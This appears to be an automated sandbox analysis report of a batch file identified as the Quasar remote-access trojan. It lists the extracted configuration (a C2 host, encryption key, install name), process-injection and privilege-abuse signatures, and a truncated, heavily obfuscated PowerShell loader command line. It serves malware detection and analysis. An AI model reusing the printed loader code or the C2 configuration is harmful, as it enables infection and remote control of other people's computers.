Analysis
-
max time kernel
300s -
max time network
260s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
14-05-2024 20:30
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni.bat
Resource
win10v2004-20240508-en
General
-
Target
Uni.bat
-
Size
513KB
-
MD5
a84be587721ab2558489178539f283e6
-
SHA1
5a48f5c98f7366d13f371965c19c98a5754bd90b
-
SHA256
32cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
-
SHA512
c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931
-
SSDEEP
12288:PlknMJu9SVaydjmxZ8yeMfd0dwOk6VWX0sQFjh80wszzd0VmONTlomwcuz:q6uidS6MdIdVWksQFjS0bzzOY+oX5z
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-AidubAN29rBfWYM23w
-
encryption_key
GNF1G2eu7MrbS69M7a4f
-
install_name
Client.exe
-
log_directory
$SXR-LOGS
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3080-200-0x0000000009330000-0x000000000939C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 1280 created 584 1280 powershell.EXE winlogon.exe PID 4332 created 584 4332 powershell.EXE winlogon.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 2 3080 powershell.exe 4 3080 powershell.exe 6 3080 powershell.exe 8 3080 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 3080 powershell.exe 4608 powershell.exe 316 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
install.exeinstall.exepid process 4084 install.exe 4232 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 18 IoCs
Processes:
svchost.exesvchost.exepowershell.EXEOfficeClickToRun.exepowershell.EXEsvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\$77svc64 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 1280 set thread context of 1616 1280 powershell.EXE dllhost.exe PID 4332 set thread context of 3916 4332 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
OfficeClickToRun.exesvchost.exepowershell.EXEpowershell.EXEdescription ioc process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 14 May 2024 20:32:05 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={C2FBEA2B-F513-451D-B832-98713A0C28F0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715718724" OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings powershell.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exepid process 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 316 powershell.exe 316 powershell.exe 316 powershell.exe 3080 powershell.exe 3080 powershell.exe 3080 powershell.exe 1280 powershell.EXE 1280 powershell.EXE 1280 powershell.EXE 1280 powershell.EXE 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 3080 powershell.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe 1616 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4608 powershell.exe Token: SeDebugPrivilege 316 powershell.exe Token: SeIncreaseQuotaPrivilege 316 powershell.exe Token: SeSecurityPrivilege 316 powershell.exe Token: SeTakeOwnershipPrivilege 316 powershell.exe Token: SeLoadDriverPrivilege 316 powershell.exe Token: SeSystemProfilePrivilege 316 powershell.exe Token: SeSystemtimePrivilege 316 powershell.exe Token: SeProfSingleProcessPrivilege 316 powershell.exe Token: SeIncBasePriorityPrivilege 316 powershell.exe Token: SeCreatePagefilePrivilege 316 powershell.exe Token: SeBackupPrivilege 316 powershell.exe Token: SeRestorePrivilege 316 powershell.exe Token: SeShutdownPrivilege 316 powershell.exe Token: SeDebugPrivilege 316 powershell.exe Token: SeSystemEnvironmentPrivilege 316 powershell.exe Token: SeRemoteShutdownPrivilege 316 powershell.exe Token: SeUndockPrivilege 316 powershell.exe Token: SeManageVolumePrivilege 316 powershell.exe Token: 33 316 powershell.exe Token: 34 316 powershell.exe Token: 35 316 powershell.exe Token: 36 316 powershell.exe Token: SeIncreaseQuotaPrivilege 316 powershell.exe Token: SeSecurityPrivilege 316 powershell.exe Token: SeTakeOwnershipPrivilege 316 powershell.exe Token: SeLoadDriverPrivilege 316 powershell.exe Token: SeSystemProfilePrivilege 316 powershell.exe Token: SeSystemtimePrivilege 316 powershell.exe Token: SeProfSingleProcessPrivilege 316 powershell.exe Token: SeIncBasePriorityPrivilege 316 powershell.exe Token: SeCreatePagefilePrivilege 316 powershell.exe Token: SeBackupPrivilege 316 powershell.exe Token: SeRestorePrivilege 316 powershell.exe Token: SeShutdownPrivilege 316 powershell.exe Token: SeDebugPrivilege 316 powershell.exe Token: SeSystemEnvironmentPrivilege 316 powershell.exe Token: SeRemoteShutdownPrivilege 316 powershell.exe Token: SeUndockPrivilege 316 powershell.exe Token: SeManageVolumePrivilege 316 powershell.exe Token: 33 316 powershell.exe Token: 34 316 powershell.exe Token: 35 316 powershell.exe Token: 36 316 powershell.exe Token: SeIncreaseQuotaPrivilege 316 powershell.exe Token: SeSecurityPrivilege 316 powershell.exe Token: SeTakeOwnershipPrivilege 316 powershell.exe Token: SeLoadDriverPrivilege 316 powershell.exe Token: SeSystemProfilePrivilege 316 powershell.exe Token: SeSystemtimePrivilege 316 powershell.exe Token: SeProfSingleProcessPrivilege 316 powershell.exe Token: SeIncBasePriorityPrivilege 316 powershell.exe Token: SeCreatePagefilePrivilege 316 powershell.exe Token: SeBackupPrivilege 316 powershell.exe Token: SeRestorePrivilege 316 powershell.exe Token: SeShutdownPrivilege 316 powershell.exe Token: SeDebugPrivilege 316 powershell.exe Token: SeSystemEnvironmentPrivilege 316 powershell.exe Token: SeRemoteShutdownPrivilege 316 powershell.exe Token: SeUndockPrivilege 316 powershell.exe Token: SeManageVolumePrivilege 316 powershell.exe Token: 33 316 powershell.exe Token: 34 316 powershell.exe Token: 35 316 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 3080 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEdllhost.exedescription pid process target process PID 4924 wrote to memory of 4608 4924 cmd.exe powershell.exe PID 4924 wrote to memory of 4608 4924 cmd.exe powershell.exe PID 4924 wrote to memory of 4608 4924 cmd.exe powershell.exe PID 4608 wrote to memory of 316 4608 powershell.exe powershell.exe PID 4608 wrote to memory of 316 4608 powershell.exe powershell.exe PID 4608 wrote to memory of 316 4608 powershell.exe powershell.exe PID 4608 wrote to memory of 2524 4608 powershell.exe WScript.exe PID 4608 wrote to memory of 2524 4608 powershell.exe WScript.exe PID 4608 wrote to memory of 2524 4608 powershell.exe WScript.exe PID 2524 wrote to memory of 1880 2524 WScript.exe cmd.exe PID 2524 wrote to memory of 1880 2524 WScript.exe cmd.exe PID 2524 wrote to memory of 1880 2524 WScript.exe cmd.exe PID 1880 wrote to memory of 3080 1880 cmd.exe powershell.exe PID 1880 wrote to memory of 3080 1880 cmd.exe powershell.exe PID 1880 wrote to memory of 3080 1880 cmd.exe powershell.exe PID 3080 wrote to memory of 4084 3080 powershell.exe install.exe PID 3080 wrote to memory of 4084 3080 powershell.exe install.exe PID 3080 wrote to memory of 4084 3080 powershell.exe install.exe PID 1280 wrote to memory of 1616 1280 powershell.EXE dllhost.exe PID 1280 wrote to memory of 1616 1280 powershell.EXE dllhost.exe PID 1280 wrote to memory of 1616 1280 powershell.EXE dllhost.exe PID 1280 wrote to memory of 1616 1280 powershell.EXE dllhost.exe PID 1280 wrote to memory of 1616 1280 powershell.EXE dllhost.exe PID 1280 wrote to memory of 1616 1280 powershell.EXE dllhost.exe PID 1280 wrote to memory of 1616 1280 powershell.EXE dllhost.exe PID 1280 wrote to memory of 1616 1280 powershell.EXE dllhost.exe PID 1616 wrote to memory of 584 1616 dllhost.exe winlogon.exe PID 1616 wrote to memory of 636 1616 dllhost.exe lsass.exe PID 1616 wrote to memory of 728 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 908 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1004 1616 dllhost.exe dwm.exe PID 1616 wrote to memory of 64 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 304 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 380 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1040 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1080 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1100 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1172 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1220 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1304 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1324 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1336 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1416 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1472 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1540 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1564 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1584 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1664 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1680 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1796 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1804 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1868 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1904 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 1536 1616 dllhost.exe spoolsv.exe PID 1616 wrote to memory of 1900 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 2060 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 2364 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 2492 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 2536 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 2544 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 2588 1616 dllhost.exe sihost.exe PID 1616 wrote to memory of 2632 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 2708 1616 dllhost.exe svchost.exe PID 1616 wrote to memory of 2716 1616 dllhost.exe sysmon.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{8d270833-923a-46c5-8fa9-68ee0dd04d06}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f6c7e7a3-fe92-4237-9aa9-a69f62c83af9}2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UrpccseDxPsG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jQTUterbvHBIxE,[Parameter(Position=1)][Type]$WXxiytiDmU)$nroGedzZSVZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+'dD'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+[Char](109)+'o'+[Char](114)+'y'+'M'+''+[Char](111)+''+'d'+''+'u'+''+'l'+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+''+'a'+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+'A'+''+'n'+''+'s'+''+'i'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nroGedzZSVZ.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+'p'+''+'e'+'c'+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$jQTUterbvHBIxE).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nroGedzZSVZ.DefineMethod('I'+'n'+''+[Char](118)+''+[Char](111)+'k'+'e'+'','P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+','+[Char](72)+'i'+'d'+'eB'+'y'+''+[Char](83)+'ig,'+[Char](78)+'e'+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$WXxiytiDmU,$jQTUterbvHBIxE).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+''+'i'+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+'d'+'');Write-Output $nroGedzZSVZ.CreateType();}$DODpLOnFksKcP=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+''+'t'+'em.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$oDjiOhHAGHWQNV=$DODpLOnFksKcP.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Pro'+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+',S'+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object 